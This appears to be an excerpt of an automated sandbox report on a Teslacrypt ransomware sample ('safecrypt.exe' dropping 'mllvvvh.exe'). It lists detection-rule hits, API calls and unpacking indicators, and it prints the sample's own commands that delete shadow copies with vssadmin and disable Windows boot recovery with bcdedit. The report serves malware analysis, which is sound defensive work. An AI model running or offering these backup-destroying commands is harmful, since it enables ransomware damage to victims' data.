            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040216020_2_00402160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040B16020_2_0040B160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040CD2020_2_0040CD20
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00420DF020_2_00420DF0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004245A720_2_004245A7
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004251A520_2_004251A5
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00402E6020_2_00402E60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0040D2C020_2_0040D2C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00421EE020_2_00421EE0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004182A020_2_004182A0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00419F6020_2_00419F60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041C77020_2_0041C770
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00420B1020_2_00420B10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004107C020_2_004107C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041D3D020_2_0041D3D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041C3E020_2_0041C3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0041BF8020_2_0041BF80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00410F8020_2_00410F80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041F3E020_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040281020_1_00402810
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0042402020_1_00424020
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0042342120_1_00423421
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040FD5020_1_0040FD50
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041015020_1_00410150
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040216020_1_00402160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040B16020_1_0040B160
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040CD2020_1_0040CD20
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00420DF020_1_00420DF0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00402E6020_1_00402E60
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0040D2C020_1_0040D2C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00421EE020_1_00421EE0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_004182A020_1_004182A0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041C77020_1_0041C770
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00420B1020_1_00420B10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_004107C020_1_004107C0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041D3D020_1_0041D3D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041C3E020_1_0041C3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00410F8020_1_00410F80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_0041BF8020_1_0041BF80
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: String function: 0042CC76 appears 50 times
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: String function: 00428D80 appears 76 times
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: String function: 0042CC76 appears 36 times
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: String function: 00428D80 appears 54 times
            Source: safecrypt.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: mllvvvh.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safecrypt.exe, 00000000.00000002.326165190.0000000002670000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMFC42.DLL.MUIR vs safecrypt.exe
            Source: safecrypt.exe, 00000000.00000003.323351259.0000000002980000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000000.324184391.000000000086F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameTODO: <Original filename>J vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.329206253.0000000000890000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.330081586.0000000002B00000.00000002.00000001.sdmpBinary or memory string: originalfilename vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.330081586.0000000002B00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs safecrypt.exe
            Source: safecrypt.exe, 00000001.00000002.329921338.0000000002A00000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs safecrypt.exe
            Source: safecrypt.exeBinary or memory string: OriginalFilenameAintl.EXE@ vs safecrypt.exe
            Source: safecrypt.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 20.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt tc_detection_name = Teslacrypt, author = ReversingLabs, tc_detection_type = Ransomware
            Source: safecrypt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: mllvvvh.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.evad.winEXE@37/1004@6/3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,1_2_004204D0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,1_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,4_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004204D0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_004204D0 AdjustTokenPrivileges,FindCloseChangeNotification,20_1_004204D0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,FindCloseChangeNotification,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_1_0041CBF0
            Source: C:\Users\user\Desktop\safecrypt.exeFile created: C:\Users\user\AppData\Roaming\mllvvvh.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMutant created: \Sessions\1\BaseNamedObjects\__sys_234238233295
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: Shell32.dll1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: KERNEL321_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: \recover_file_1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .txt1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: %s%s%S%d1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .HTM1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: Shell32.dll1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: KERNEL321_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: \recover_file_1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .txt1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: %s%s%S%d1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .HTM1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_2_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: Shell32.dll1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: KERNEL321_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: \recover_file_1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .txt1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: %s%s%S%d1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: .HTM1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\Desktop\safecrypt.exeCommand line argument: open1_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: Shell32.dll4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: KERNEL324_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: \recover_file_4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .txt4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: %s%s%S%d4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .HTM4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open4_1_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: Shell32.dll20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: KERNEL3220_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: \recover_file_20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .txt20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: %s%s%S%d20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: .HTM20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCommand line argument: open20_2_0041F3E0
            Source: safecrypt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\safecrypt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: safecrypt.exeVirustotal: Detection: 91%
            Source: safecrypt.exeMetadefender: Detection: 73%
            Source: safecrypt.exeReversingLabs: Detection: 96%
            Source: C:\Users\user\Desktop\safecrypt.exeFile read: C:\Users\user\Desktop\safecrypt.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exe
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe' Jump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exeJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXEJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: safecrypt.exeStatic PE information: More than 200 imports for USER32.dll

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\safecrypt.exeUnpacked PE file: 1.2.safecrypt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\safecrypt.exeUnpacked PE file: 1.2.safecrypt.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042D27C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0042D27C
            Source: safecrypt.exeStatic PE information: real checksum: 0x510014b0 should be: 0x7b021
            Source: mllvvvh.exe.1.drStatic PE information: real checksum: 0x510014b0 should be: 0x7b021
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00428DC5 push ecx; ret 1_2_00428DD8
